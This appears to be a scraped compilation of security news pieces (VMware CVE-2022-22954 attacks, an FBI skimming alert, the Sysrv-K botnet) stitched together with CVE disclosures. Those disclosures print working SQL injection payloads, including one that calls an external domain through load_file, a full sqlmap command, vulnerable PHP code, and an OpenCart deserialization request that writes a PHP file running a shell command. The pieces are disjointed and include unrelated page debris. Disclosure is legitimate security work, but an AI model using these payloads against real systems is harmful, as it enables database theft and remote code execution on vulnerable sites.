A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.

Recently uncovered VMware vulnerabilities continue to anchor an ongoing wave of cyberattacks bent on dropping various payloads. In the latest spate of activity, nefarious types are going in with the ultimate goal of infecting targets with various botnets or establishing a backdoor via Log4Shell.

That's according to Barracuda researchers, who found that attackers are particularly probing for the critical vulnerability tracked as CVE-2022-22954 in droves, with swaths of actual exploitation attempts in the mix as well.

The security vulnerability carries a CVSS score of 9.8 and affects the VMware Workspace ONE Access and Identity Manager. Workspace ONE is VMware's platform for delivering corporate applications to any device (a sort of juiced-up mobile device management solution), and the identity manager handles authentication to the platform. The bug allows remote code execution (RCE) via server-side template injection for attackers that have network access.

"A server-side template-injection issue may allow an unauthenticated user with access to the Web interface to execute any arbitrary shell command as the VMware user," Mike Goldgof, Barracuda's senior director of product marketing for data protection, network, and application security, tells Dark Reading. "In effect, a hacker can bring down the system, extract data, inject ransomware, etc."

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," Goldgof noted. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets." 

The activity sometimes involves a second bug (CVE-2022-22960, CVSS score of 7.8), which is a local privilege escalation (LPE) vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation (a platform for creating private clouds). The bug arises because of improper permissions in support scripts, according to VMware's advisory, and could allow attackers with local access to achieve root privileges. 

In this case, it's being chained with the previous flaw for a full exploitation vector, Barracuda noted.

VMware disclosed the bugs in April, and soon thereafter, a proof-of-concept (PoC) exploit was released on GitHub and tweeted out to the world. Unsurprisingly, researchers from multiple security firms started seeing probes and exploit attempts very soon thereafter — and the hits just keep coming. 

"Any serious vulnerability in a broadly used platform or application is cause for concern. Threat actors are always looking for an opportunity to hit multiple targets with minimal effort," Mike Parkin, senior technical engineer at Vulcan Cyber, tells Dark Reading. "VMware is one of the most popular virtualization platforms around, and often runs on powerful iron with multiple applications running on top of it. This gives an attacker multiple reasons to go after VMware servers."

**VMware Payloads du Jour**  
Barracuda researchers noticed that most of the probing in its telemetry now is for the VMware RCE vulnerability, using the PoC code from GitHub. Most of the actual exploit attempts meanwhile are now primarily from botnet operators, especially IPs hosting variants of the Mirai distributed denial-of-service (DDoS) botnet malware, along with a few EnemyBot samples (another DDoS baddie).

Otherwise, "some Log4Shell exploit attempts were also seen in the data," researchers noted.

As for who's behind the attacks, most originate in the US (76%), mostly emanating from data centers and cloud providers. However, the researchers also found "consistent background attempts" from Russian IP addresses that are well known to be affiliated with opportunistic cybercrime cartels.

"Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes," the researchers explained.

In April, another set of attacks was flagged, with a very different aim. An Iranian cyber-espionage group known as Rocket Kitten was seen exploiting the CVE-2022-22954 RCE to deliver the Core Impact penetration testing tool on vulnerable systems. And in another batch of April activity, cryptominers reportedly made their way into the exploitation-palooza lineup.

After several initial spikes in April, the interest levels in triggering these vulnerabilities have been holding steady, according to Barracuda, and the firm expects the scanning and exploitation attempts to continue for some time.

The best defense against this spate of attacks (and most botnet and Log4Shell activity) is Security 101 — i.e., patching. Defenders can also build in an extra layer of protection with a Web application firewall (WAF), adding "defense in depth against zero-day attacks and other vulnerabilities," according to Barracuda's Tuesday writeup.

It's important for companies to hop on patches for popular platforms as soon as vendor disclosures come out, Goldgof notes.

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," he says. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets."

Critical VMware Bug Exploits Continue, as Botnet Operators Jump In

Law enforcement is warning about a wave of Web injection attacks on US online retailers that are successfully stealing credit-card information from online checkout pages.

Cyberattackers are targeting US online businesses by injecting malicious PHP code into e-commerce checkout pages and exfiltrating scraped data to a command-and-control (C2) server spoofed to look like a legitimate credit-card processor.

That's according to a flash alert from the FBI issued this week, which detailed one attack in particular that began in September 2020. Along with scraping credit-card data, the cybercriminals were modifying the business checkout page code to gain backdoor access to the business' system. The FBI provided indicators of compromise and recommended mitigations for similar e-tailers, including patching and ongoing monitoring of e-commerce environments. 

**Businesses Should Take Alert 'Seriously'**  
Cyvatar CISO Dave Cundiff explained in an emailed reaction to the alert that basic cybersecurity hygiene and monitoring would be enough to fend off this sort of attack. 

"Continually verifying and monitoring an organization's fundamental cybersecurity is a requirement these days," Cundiff said. "If the fundamentals of an organization’s security are not strong, then the additional complexity of any additional security is useless." 

US businesses should take this alert seriously, according to Kunal Modasiya, senior director of product management at PerimeterX,.

"Given the risks of supply-chain attacks in general, it is important that businesses look beyond server-side security tools, such as static code analysis, external scanners, and the limitations of CSP to solutions," Modasiya says. 

Ron Bradley, vice president of Shared Assessments, meanwhile notes that organizations dealing with credit-card data, which he called "one of the crown jewels for fraudsters," should have technical controls like file integrity monitoring (FIM) in place.  

"If you're running a website, especially one which transacts funds, and if you don't have FIM implemented, I don't want to shop there," Bradley said. "Furthermore, you're going to get pummeled by bad actors because you don't have your house in order."

FBI: E-Tailers, Beware Web Injections for Scraping Credit-Card Data, Backdoors

In Covid 19 Travel Pass Management 1.0, the code parameter is vulnerable to SQL injection attacks.

The code parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\kyy'))+' was submitted in the code parameter. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system.

\--\-
Parameter: code (GET)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' OR NOT 7325=7325 AND 'vRQn'\='vRQn

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 1607 FROM(SELECT COUNT(\*),CONCAT(0x7171707071,(SELECT (ELT(1607=1607,1))),0x7176707171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'HjrM'\='HjrM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' AND (SELECT 2775 FROM (SELECT(SLEEP(5)))lkxH) AND 'bdqR'\='bdqR

    Type: UNION query
    Title: MySQL UNION query (NULL) \- 10 columns
    Payload: page\=view\_pass&code\=775545'+(select load\_file('\\\\\\\\okcga8d7p54vhfqrqqf74l3tvk1dp6dxgl78ywn.namaikatiputkata.com\\\\kyy'))+'' UNION ALL SELECT NULL,CONCAT(0x7171707071,0x584d675163465844744f504c484d4256425463675863674948566f6b68474f464f64634e6b5a596a,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
\---

<?php

if(isset($\_GET\['code'\]) && $\_GET\['code'\] > 0){
    $qry = $conn\->query("SELECT \* FROM application\_list where code = '{$\_GET\['code'\]}'");
    if($qry\->num\_rows > 0){
        foreach($qry\->fetch\_assoc() as $k => $v){
            $$k\=$v;
        }
		if(isset($individual\_id)){
			$user\_qry = $conn\->query("SELECT \*, concat(lastname, ', ', firstname, ' ', coalesce(middlename,'')) as \`name\` from \`individual\_list\` where id = '{$individual\_id}' ");
			if($qry\->num\_rows > 0){
				foreach($user\_qry\->fetch\_assoc() as $k => $v){
					$inv\[$k\]=$v;
				}
				$meta\_qry = $conn\->query("SELECT \* FROM \`individual\_meta\` where \`individual\_id\` = '{$individual\_id}' ");
				while($row = $meta\_qry\->fetch\_assoc()){
					$inv\[$row\['meta\_field'\]\] = $row\['meta\_value'\];
				}
			}
		}
    }
}
?>

CVE-2022-30054: CVE-nu11secur1ty/vendors/oretnom23/2022/Covid-19-Travel-Pass-Management at main · nu11secur1ty/CVE-nu11secur1ty

In Home Clean Service System 1.0, the password parameter is vulnerable to SQL injection attacks.

**Home Clean Service System****Vendor**

**Description:**

The password parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the password parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

\[+\] Payloads:

\--\-
Parameter: MULTIPART email ((custom) POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause (NOT)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECT COUNT(\*),CONCAT(0x7176716271,(SELECT (ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: \--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="email"

uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM (SELECT(SLEEP(5)))kgBM)-- GxTm
\------WebKitFormBoundary8kMPLwTOJeesgEBx
Content-Disposition: form-data; name="password"
t8I!x2y!H3'
\--\----WebKitFormBoundary8kMPLwTOJeesgEBx
Content\-Disposition: form\-data; name\="login"

\--\----WebKitFormBoundary8kMPLwTOJeesgEBx--
\--\-

**Vulnerable code:**

<?php
	session\_start();
	$username = $\_POST\['username'\];
	$password = $\_POST\['password'\];
	if(ISSET($\_POST\['login'\])){
		$conn = new mysqli("localhost","root","","activity") or die(mysqli\_error());
		$query = $conn\->query("SELECT \*FROM \`admin\` WHERE \`username\` = '$username' && \`password\` = '$password'") or die(mysqli\_error());
		$fetch = $query\->fetch\_array();
		$valid = $query\->num\_rows;
			if($valid > 0){
				$\_SESSION\['admin\_id'\] = $fetch\['admin\_id'\];
				header("location:./dashboard.php");
			}else{
				echo "<script>alert('Invalid username or password')</script>";
				echo "<script>window.location = 'index.php'</script>";
			}
		$conn\->close();
	}	

**Reproduce:**

href

**Proof and Exploit:**

href

CVE-2022-30052: CVE-nu11secur1ty/vendors/acetech/2022/Home-Clean-Service-System at main · nu11secur1ty/CVE-nu11secur1ty

Persistent Cross-Site Scripting (XSS) vulnerability in Alexander Stokmann's Code Snippets Extended plugin <= 1.4.7 on WordPress via Cross-Site Request Forgery (vulnerable parameters &title, &snippet_code).

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 17, 2022 and is not available for download. This closure is temporary, pending a full review.

Simple, with preview and versatile.

Nice idea of a plugin. Sadly however php code doesn't work. Even the provided examples are not running as the " are all escaped. Too bad 🙁

allows us to add php anywhere using shortcodes. No more messing with functions.php file, making custom page templates or spawning child themes for a bit of custom logic. AMAZING

Thank you for this plugin! Helps me a lot!

I've tried several plugins to be able to add code easily and this one has always been the best experience of all. Surprised it isn't more popular!

Very very good! Using a very simple and a good helper!

Read all 10 reviews

“Code Snippets Extended” is open source software. The following people have contributed to this plugin.

Contributors

*    aftamat4ik

CVE-2022-29436: Code Snippets Extended

By Deeba Ahmed
Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems. The Microsoft…
This is a post from HackRead.com Read the original post: New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer

Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems.

The Microsoft Security Intelligence team posted a series of tweets on their official Twitter handle (@MsftSecIntel) to reveal startling details on the new variant of the notorious Sysrv botnet dubbed Sysrv-K.

According to the thread, the new variant exploits vulnerabilities recently identified in the Spring Framework’s API gateway called the Spring Cloud Gateway and WordPress and deploys cryptocurrency miners on Windows and Linux systems.

**How does the Botnet work?**

According to Microsoft, the botnet first scans the web to identify vulnerable servers and installs itself. The vulnerabilities it looks for include remote file disclosure, remote code execution, path traversal, and arbitrary file download.

The tech giant noted that Sysrv-K exploits numerous old flaws, particularly those identified in WordPress, as well as new vulnerabilities like CVE-2022-22947, which has a CVSS score of 10 and affects the Spring Cloud Gateway and Oracle’s Communications Cloud-Native Core Network Exposure Function.

The vulnerability exposes apps to code injection attacks and allows unauthorized attackers to carry out remote code execution. Interestingly, all these vulnerabilities have patches.

**Details of Sysrv and Sysrv-K**

The Sysrv botnet has been active since late 2020 and exploits known security flaws in access interfaces to install a Monero crypto miner on compromised Windows and Linux systems. The older version of the botnet targeted databases and web apps, such as Confluence, Jira, MongoDB, Oracle WebLogic, ThinkPHP, Mongo-Express, Drupal, Apache Struts, and Salt-API, reported Juniper in 2021.

The new version comes with a range of new features. Such as it can scan for WordPress configuration files and their backups to extract database credentials. The botnet uses the information to control the webserver.

Additionally, it boasts advanced communication features, including using a Telegram bot. It can scan for SSH keys, hostnames, and IP addresses and spread its copies across the network to infect the entire network and make it a part of its botnet army.

Microsoft Security Intelligence team on Twitter

**More Linux and Windows Botnet News**

1.  Old crypto-malware makes come back, hits Windows, Linux devices
2.  Kraken botnet bypasses Windows Defender to steal crypto wallet data
3.  HolesWarm crypto-malware hits unpatched Linux and Windows servers
4.  Beware; Adwind RAT infecting Windows, OS X, Linux and Android Devices
5.  Linux & Windows hit with disk wiper, ransomware & crypto Xbash malware

**How to Stay Safe?**

Microsoft suggests that organizations using internet-exposed Linux or Windows systems must install security updates immediately as it is imperative to secure these systems. They must ensure “building credential hygiene” and timely apply security updates.

New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer

needrestart 0.8 through 3.5 before 3.6 is prone to local privilege escalation. Regexes to detect the Perl, Python, and Ruby interpreters are not anchored, allowing a local user to escalate privileges when needrestart tries to detect if interpreters are using old source files.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2022-30688: security - CVE-2022-30688: needrestart 0.8+ local privilege escalation

WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-30072: CVE/CVE-2022-30072.pdf at main · APTX-4879/CVE

Online Discussion Forum Site version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection# Date: 15/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Code:line 3 in file "/odfs/posts/view_post.php"$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");# Sqlmap command:sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post

Online Discussion Forum Site 1.0 SQL Injection

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

Tag

#php